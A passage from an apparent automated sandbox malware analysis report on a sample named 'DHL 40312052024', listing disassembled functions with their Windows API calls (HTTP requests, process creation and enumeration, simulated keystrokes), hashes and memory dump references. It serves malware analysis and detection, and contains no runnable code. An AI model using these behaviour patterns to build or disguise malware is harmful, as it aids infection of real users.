                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 007ECD68
                                                                                    • ReleaseDC.USER32(?,00000000), ref: 007ECD70
                                                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 007ECDFB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                    • String ID: U
                                                                                    • API String ID: 4009187628-3372436214
                                                                                    • Opcode ID: 647556dd8fcc48a04c26483138c60d0e53ea885f3b75e953dbda7d704a9f9175
                                                                                    • Instruction ID: 201f2ff83b838fda52ea170ca2439740db413a19acce0701381a8e53ed1d50fc
                                                                                    • Opcode Fuzzy Hash: 647556dd8fcc48a04c26483138c60d0e53ea885f3b75e953dbda7d704a9f9175
                                                                                    • Instruction Fuzzy Hash: 0171E135901245DFCF26CF65CC88AEA3BB5FF4C310F14426AED559A266C739C892DB60
                                                                                    Function 00821A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00821A50
                                                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00821A7C
                                                                                    • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00821ABE
                                                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00821AD3
                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00821AE0
                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00821B10
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00821B57
                                                                                      • Part of subcall function 00822483: GetLastError.KERNEL32(?,?,00821817,00000000,00000000,00000001), ref: 00822498
                                                                                      • Part of subcall function 00822483: SetEvent.KERNEL32(?,?,00821817,00000000,00000000,00000001), ref: 008224AD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                                    • String ID:
                                                                                    • API String ID: 2603140658-3916222277
                                                                                    • Opcode ID: 50d7a7939432173fb9e78c6e398c7634ddc4fa775ad0a7d882c14342dfc770c4
                                                                                    • Instruction ID: 5e711684b1dbce2c1b1144b0e25436d8f5f05682024c40aa01fdca9e62a02036
                                                                                    • Opcode Fuzzy Hash: 50d7a7939432173fb9e78c6e398c7634ddc4fa775ad0a7d882c14342dfc770c4
                                                                                    • Instruction Fuzzy Hash: 2C416CB1901228BFEF119F50DC89FBB7BACFB18354F10412AFA05DA151E7749E848BA1
                                                                                    Function 00828C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0083F910), ref: 00828D28
                                                                                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0083F910), ref: 00828D5C
                                                                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00828ED6
                                                                                    • SysFreeString.OLEAUT32(?), ref: 00828F00
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                    • String ID:
                                                                                    • API String ID: 560350794-0
                                                                                    • Opcode ID: 742fc2639921ab2b75e2d37a8eb96cde1510b1139d7fc0af63762070744da32b
                                                                                    • Instruction ID: d90c23c625bc10ca418b751b4661bd99276b019f087549d9556bc8fece56883f
                                                                                    • Opcode Fuzzy Hash: 742fc2639921ab2b75e2d37a8eb96cde1510b1139d7fc0af63762070744da32b
                                                                                    • Instruction Fuzzy Hash: D6F10575A00219EFCF14DF94D888EAEB7B9FF49314F108498F915AB251DB31AE85CB90
                                                                                    Function 0082F694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 0082F6B5
                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0082F848
                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0082F86C
                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0082F8AC
                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0082F8CE
                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0082FA4A
                                                                                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0082FA7C
                                                                                    • CloseHandle.KERNEL32(?), ref: 0082FAAB
                                                                                    • CloseHandle.KERNEL32(?), ref: 0082FB22
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                    • String ID:
                                                                                    • API String ID: 4090791747-0
                                                                                    • Opcode ID: 3b6c47472b3c614d62d1c9da804866ef262af99cdcadd4bde943ab7853154674
                                                                                    • Instruction ID: 6c9a37633c5cb5787bd1d265bdeb1529a3074a523598c9133aeae61bc90e0d82
                                                                                    • Opcode Fuzzy Hash: 3b6c47472b3c614d62d1c9da804866ef262af99cdcadd4bde943ab7853154674
                                                                                    • Instruction Fuzzy Hash: 9EE188316042109FC714EF24D895B6ABBF1FF85314F14896DFA998B2A2DB35DC81CB52
                                                                                    Function 00814CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0081466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00813697,?), ref: 0081468B
                                                                                      • Part of subcall function 0081466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00813697,?), ref: 008146A4
                                                                                      • Part of subcall function 00814A31: GetFileAttributesW.KERNEL32(?,0081370B), ref: 00814A32
                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 00814D40
                                                                                    • _wcscmp.LIBCMT ref: 00814D5A
                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00814D75
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                    • String ID:
                                                                                    • API String ID: 793581249-0
                                                                                    • Opcode ID: a4cf15bf0aaa7147136f1003672476324f25bc4b7b75e67f826316ad57b61339
                                                                                    • Instruction ID: 93034731dbd75544020b008720da62d6b326270255556f84b8cf2b9a0ebeeae7
                                                                                    • Opcode Fuzzy Hash: a4cf15bf0aaa7147136f1003672476324f25bc4b7b75e67f826316ad57b61339
                                                                                    • Instruction Fuzzy Hash: 915141B25083859BC724EB64D8859DFB3ECEF84350F50092FF289D3152EE35A689C766
                                                                                    Function 00838645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 008386FF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: InvalidateRect
                                                                                    • String ID:
                                                                                    • API String ID: 634782764-0
                                                                                    • Opcode ID: fcff63ff8912cc1fc6c0c5887e37f6a433605b01702291743b366f69de262101
                                                                                    • Instruction ID: a8ca7d420274652eb6b0ea30af498afa5906d522b7cae9e399b1ef905e6692a8
                                                                                    • Opcode Fuzzy Hash: fcff63ff8912cc1fc6c0c5887e37f6a433605b01702291743b366f69de262101
                                                                                    • Instruction Fuzzy Hash: 7751AF30500348FEEF249B28CC8AFA93BA5FB95354F604525FA15E61A1DFB5A980CBC1
                                                                                    Function 007B2B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 007EC2F7
                                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 007EC319
                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 007EC331
                                                                                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 007EC34F
                                                                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 007EC370
                                                                                    • DestroyIcon.USER32(00000000), ref: 007EC37F
                                                                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 007EC39C
                                                                                    • DestroyIcon.USER32(?), ref: 007EC3AB
                                                                                      • Part of subcall function 0083A4AF: DeleteObject.GDI32(00000000), ref: 0083A4E8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                                    • String ID:
                                                                                    • API String ID: 2819616528-0
                                                                                    • Opcode ID: 2252ff697cece60cedcd5b218debb1249e625e9162fd304bf4e49120bf52d7b6
                                                                                    • Instruction ID: e419f3d939890afa5f44fad896073a511661f364fd15a3f2af61f5e16032851a
                                                                                    • Opcode Fuzzy Hash: 2252ff697cece60cedcd5b218debb1249e625e9162fd304bf4e49120bf52d7b6
                                                                                    • Instruction Fuzzy Hash: 85517A74A01205EFDB24DF65CC45FAB3BA5FB58310F104528F906972A1EBB4EC92DB91
                                                                                    Function 0080966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0080A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0080A84C
                                                                                      • Part of subcall function 0080A82C: GetCurrentThreadId.KERNEL32 ref: 0080A853
                                                                                      • Part of subcall function 0080A82C: AttachThreadInput.USER32(00000000,?,00809683,?,00000001), ref: 0080A85A
                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 0080968E
                                                                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 008096AB
                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 008096AE
                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 008096B7
                                                                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 008096D5
                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 008096D8
                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 008096E1
                                                                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 008096F8
                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 008096FB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2014098862-0
                                                                                    • Opcode ID: c980f29a3ce3a2c09dbcbeea3dae899141b993c0908a5f914562a2b97d9d2266
                                                                                    • Instruction ID: b0f42012b4a2566e4f73724bfeb0e1a174a09cceb8c0b9993b83b6ade9125200
                                                                                    • Opcode Fuzzy Hash: c980f29a3ce3a2c09dbcbeea3dae899141b993c0908a5f914562a2b97d9d2266
                                                                                    • Instruction Fuzzy Hash: 8A11CEB1910618BEF6106B64DC8AF6A3A2DFB8C751F100825F344AB0E2C9F35C10DAE4
                                                                                    Function 00808921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0080853C,00000B00,?,?), ref: 0080892A
                                                                                    • HeapAlloc.KERNEL32(00000000,?,0080853C,00000B00,?,?), ref: 00808931
                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0080853C,00000B00,?,?), ref: 00808946
                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,0080853C,00000B00,?,?), ref: 0080894E
                                                                                    • DuplicateHandle.KERNEL32(00000000,?,0080853C,00000B00,?,?), ref: 00808951
                                                                                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0080853C,00000B00,?,?), ref: 00808961
                                                                                    • GetCurrentProcess.KERNEL32(0080853C,00000000,?,0080853C,00000B00,?,?), ref: 00808969
                                                                                    • DuplicateHandle.KERNEL32(00000000,?,0080853C,00000B00,?,?), ref: 0080896C
                                                                                    • CreateThread.KERNEL32(00000000,00000000,00808992,00000000,00000000,00000000), ref: 00808986
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                    • String ID:
                                                                                    • API String ID: 1957940570-0
                                                                                    • Opcode ID: 1303fc565fcea3727c78a24d68530751d61e1ac05c7046dda0ce9b45f042fa22
                                                                                    • Instruction ID: 2b8cf0203d7003575314cb5b77aa62f0084cb4e8cf6b6fc101e8e04cc3f45ada
                                                                                    • Opcode Fuzzy Hash: 1303fc565fcea3727c78a24d68530751d61e1ac05c7046dda0ce9b45f042fa22
                                                                                    • Instruction Fuzzy Hash: AD01AC75640304FFE611ABA5EC49F6B3B6CFB89711F404421FB05DB1A1CA7498049A60
                                                                                    Function 00829B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                                                    • API String ID: 0-572801152
                                                                                    • Opcode ID: 2f8b9cad2535c4126ace3b52e4718b1fdecdc6371341d5190121ee939ecd0d5a
                                                                                    • Instruction ID: 7c8c14d58cd3b5e3ff70c44512892601c5eee57f94c3b9415f1d71eaf314dda8
                                                                                    • Opcode Fuzzy Hash: 2f8b9cad2535c4126ace3b52e4718b1fdecdc6371341d5190121ee939ecd0d5a
                                                                                    • Instruction Fuzzy Hash: 44C1C571A0022A9FDF10DF98E884BAEB7F5FF48314F158469E945E7281E7709D85CB90
                                                                                    Function 00829113 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$ClearInit$_memset
                                                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                    • API String ID: 2862541840-625585964
                                                                                    • Opcode ID: 53b69e9e6c7f97a4ded3e8e2dcb9b3285d2f11f7575c1cbc01aa428d4487c8e6
                                                                                    • Instruction ID: e74b51ef94beef97767cddc8d3de1e94dff988b152f0b23c7153cc45b0f17aea
                                                                                    • Opcode Fuzzy Hash: 53b69e9e6c7f97a4ded3e8e2dcb9b3285d2f11f7575c1cbc01aa428d4487c8e6
                                                                                    • Instruction Fuzzy Hash: E291AD71A00229EBDF20CFA5E848FAEB7B8FF45714F108119F955EB280D7709985CBA0
                                                                                    Function 0082975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0080710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00807044,80070057,?,?,?,00807455), ref: 00807127
                                                                                      • Part of subcall function 0080710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00807044,80070057,?,?), ref: 00807142
                                                                                      • Part of subcall function 0080710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00807044,80070057,?,?), ref: 00807150
                                                                                      • Part of subcall function 0080710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00807044,80070057,?), ref: 00807160
                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00829806
                                                                                    • _memset.LIBCMT ref: 00829813
                                                                                    • _memset.LIBCMT ref: 00829956
                                                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00829982
                                                                                    • CoTaskMemFree.OLE32(?), ref: 0082998D
                                                                                    Strings
                                                                                    • NULL Pointer assignment, xrefs: 008299DB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                    • String ID: NULL Pointer assignment
                                                                                    • API String ID: 1300414916-2785691316
                                                                                    • Opcode ID: 57bba2ef68df14eddf54ba8a698c7b36b753b9ef23dd912ad1647b5ca2670040
                                                                                    • Instruction ID: 2436cc6e8170a68d8f39710af23fe1dc1d85bbdf93aa3d389d0731ea4f4c6f5e
                                                                                    • Opcode Fuzzy Hash: 57bba2ef68df14eddf54ba8a698c7b36b753b9ef23dd912ad1647b5ca2670040
                                                                                    • Instruction Fuzzy Hash: 98911671D00229EBDB10DFA5DC45ADEBBB9FF48310F10416AF519A7291DB71AA44CFA0
                                                                                    Function 00836D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00836E24
                                                                                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 00836E38
                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00836E52
                                                                                    • _wcscat.LIBCMT ref: 00836EAD
                                                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00836EC4
                                                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00836EF2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Window_wcscat
                                                                                    • String ID: SysListView32
                                                                                    • API String ID: 307300125-78025650
                                                                                    • Opcode ID: 8267486f4d9e47e98d5ff0ff54465bd1e0d07c8ee82c50315e0a458a246f0cd0
                                                                                    • Instruction ID: b5469a186e49772640bb327dd0405868366ae495726c063e7d860954f0fa85a2
                                                                                    • Opcode Fuzzy Hash: 8267486f4d9e47e98d5ff0ff54465bd1e0d07c8ee82c50315e0a458a246f0cd0
                                                                                    • Instruction Fuzzy Hash: 9E41A570A00348EBDB219F68CC45BEA77A8FF48350F10492AF554D7292E6769D94CB90
                                                                                    Function 0082E933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00813C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00813C7A
                                                                                      • Part of subcall function 00813C55: Process32FirstW.KERNEL32(00000000,?), ref: 00813C88
                                                                                      • Part of subcall function 00813C55: CloseHandle.KERNEL32(00000000), ref: 00813D52
